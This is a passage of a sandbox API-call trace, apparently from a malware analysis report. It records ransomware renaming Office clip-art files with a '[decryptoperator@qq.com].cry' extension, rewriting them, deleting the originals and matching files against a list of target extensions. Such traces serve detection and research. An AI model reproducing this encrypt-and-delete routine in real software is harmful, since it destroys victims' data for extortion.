(hObject=0x20c) returned 1 [0053.000] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.000] SetEndOfFile (hFile=0x21c) returned 1 [0053.001] CloseHandle (hObject=0x21c) returned 1 [0053.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.001] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0053.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0053.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0053.001] lstrlenW (lpString=".doc") returned 4 [0053.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.001] lstrlenW (lpString=".docx") returned 5 [0053.001] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.001] lstrlenW (lpString=".pdf") returned 4 [0053.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.001] lstrlenW (lpString=".xls") returned 4 [0053.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.001] lstrlenW (lpString=".xlsx") returned 5 [0053.001] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.001] lstrlenW (lpString=".ppt") returned 4 [0053.001] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0053.001] lstrlenW (lpString=".zip") returned 4 [0053.002] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.002] lstrlenW (lpString=".rar") returned 4 [0053.002] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.002] lstrlenW (lpString=".bz2") returned 4 [0053.002] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.002] lstrlenW (lpString=".7z") returned 3 [0053.002] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0053.002] lstrlenW (lpString=".dbf") returned 4 [0053.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0053.002] lstrlenW (lpString=".1cd") returned 4 [0053.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0053.002] lstrlenW (lpString=".jpg") returned 4 [0053.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.017] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.017] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.017] GetLastError () returned 0x0 [0053.017] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1df4, lpOverlapped=0x0) returned 1 [0053.065] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1e00, lpOverlapped=0x0) returned 1 [0053.066] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.066] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.066] SetEndOfFile (hFile=0x20c) returned 1 [0053.066] CloseHandle (hObject=0x20c) returned 1 [0053.067] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.067] SetEndOfFile (hFile=0x21c) returned 1 [0053.067] CloseHandle (hObject=0x21c) returned 1 [0053.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0053.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0053.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0053.068] lstrlenW (lpString=".doc") returned 4 [0053.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.068] lstrlenW (lpString=".docx") returned 5 [0053.068] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.068] lstrlenW (lpString=".pdf") returned 4 [0053.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.068] lstrlenW (lpString=".xls") returned 4 [0053.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.068] lstrlenW (lpString=".xlsx") returned 5 [0053.068] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.068] lstrlenW (lpString=".ppt") returned 4 [0053.068] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0053.068] lstrlenW (lpString=".zip") returned 4 [0053.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.068] lstrlenW (lpString=".rar") returned 4 [0053.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.068] lstrlenW (lpString=".bz2") returned 4 [0053.068] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.068] lstrlenW (lpString=".7z") returned 3 [0053.068] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0053.068] lstrlenW (lpString=".dbf") returned 4 [0053.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0053.069] lstrlenW (lpString=".1cd") returned 4 [0053.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0053.069] lstrlenW (lpString=".jpg") returned 4 [0053.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.069] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2492) returned 1 [0053.069] CloseHandle (hObject=0x21c) returned 1 [0053.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 0x20 [0053.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.070] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.070] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.072] GetLastError () returned 0x0 [0053.072] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x9bc, lpOverlapped=0x0) returned 1 [0053.158] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0053.159] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.159] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.164] SetEndOfFile (hFile=0x20c) returned 1 [0053.164] CloseHandle (hObject=0x20c) returned 1 [0053.164] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.164] SetEndOfFile (hFile=0x21c) returned 1 [0053.165] CloseHandle (hObject=0x21c) returned 1 [0053.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.165] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0053.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.166] lstrlenW (lpString=".doc") returned 4 [0053.166] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString=".docx") returned 5 [0053.166] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.166] lstrlenW (lpString=".pdf") returned 4 [0053.166] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString=".xls") returned 4 [0053.166] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.166] lstrlenW (lpString=".xlsx") returned 5 [0053.166] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.166] lstrlenW (lpString=".ppt") returned 4 [0053.166] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.166] lstrlenW (lpString=".zip") returned 4 [0053.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.166] lstrlenW (lpString=".rar") returned 4 [0053.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString=".bz2") returned 4 [0053.166] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString=".7z") returned 3 [0053.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.166] lstrlenW (lpString=".dbf") returned 4 [0053.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.166] lstrlenW (lpString=".1cd") returned 4 [0053.166] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0053.166] lstrlenW (lpString=".jpg") returned 4 [0053.166] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.167] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=4808) returned 1 [0053.167] CloseHandle (hObject=0x21c) returned 1 [0053.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf")) returned 0x20 [0053.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.167] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.167] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.167] GetLastError () returned 0x0 [0053.167] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x12c8, lpOverlapped=0x0) returned 1 [0053.228] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x12d0, lpOverlapped=0x0) returned 1 [0053.230] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.230] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.230] SetEndOfFile (hFile=0x20c) returned 1 [0053.282] CloseHandle (hObject=0x20c) returned 1 [0053.282] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.282] SetEndOfFile (hFile=0x21c) returned 1 [0053.283] CloseHandle (hObject=0x21c) returned 1 [0053.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.283] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0053.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.284] lstrlenW (lpString=".doc") returned 4 [0053.284] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString=".docx") returned 5 [0053.284] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.284] lstrlenW (lpString=".pdf") returned 4 [0053.284] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString=".xls") returned 4 [0053.284] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.284] lstrlenW (lpString=".xlsx") returned 5 [0053.284] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.284] lstrlenW (lpString=".ppt") returned 4 [0053.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.284] lstrlenW (lpString=".zip") returned 4 [0053.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.284] lstrlenW (lpString=".rar") returned 4 [0053.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString=".bz2") returned 4 [0053.284] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString=".7z") returned 3 [0053.284] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.284] lstrlenW (lpString=".dbf") returned 4 [0053.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.284] lstrlenW (lpString=".1cd") returned 4 [0053.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0053.284] lstrlenW (lpString=".jpg") returned 4 [0053.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.285] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=28948) returned 1 [0053.285] CloseHandle (hObject=0x21c) returned 1 [0053.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 0x20 [0053.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.285] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.285] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.286] GetLastError () returned 0x0 [0053.286] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x7114, lpOverlapped=0x0) returned 1 [0053.319] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x7120, lpOverlapped=0x0) returned 1 [0053.321] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.321] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.321] SetEndOfFile (hFile=0x20c) returned 1 [0053.321] CloseHandle (hObject=0x20c) returned 1 [0053.321] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.321] SetEndOfFile (hFile=0x21c) returned 1 [0053.322] CloseHandle (hObject=0x21c) returned 1 [0053.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0053.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.323] lstrlenW (lpString=".doc") returned 4 [0053.323] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString=".docx") returned 5 [0053.323] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.323] lstrlenW (lpString=".pdf") returned 4 [0053.323] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString=".xls") returned 4 [0053.323] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.323] lstrlenW (lpString=".xlsx") returned 5 [0053.323] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.323] lstrlenW (lpString=".ppt") returned 4 [0053.323] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.323] lstrlenW (lpString=".zip") returned 4 [0053.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.323] lstrlenW (lpString=".rar") returned 4 [0053.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString=".bz2") returned 4 [0053.323] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString=".7z") returned 3 [0053.323] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.323] lstrlenW (lpString=".dbf") returned 4 [0053.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.323] lstrlenW (lpString=".1cd") returned 4 [0053.323] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0053.323] lstrlenW (lpString=".jpg") returned 4 [0053.323] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.407] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=22516) returned 1 [0053.407] CloseHandle (hObject=0x20c) returned 1 [0053.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 0x20 [0053.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.407] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.407] 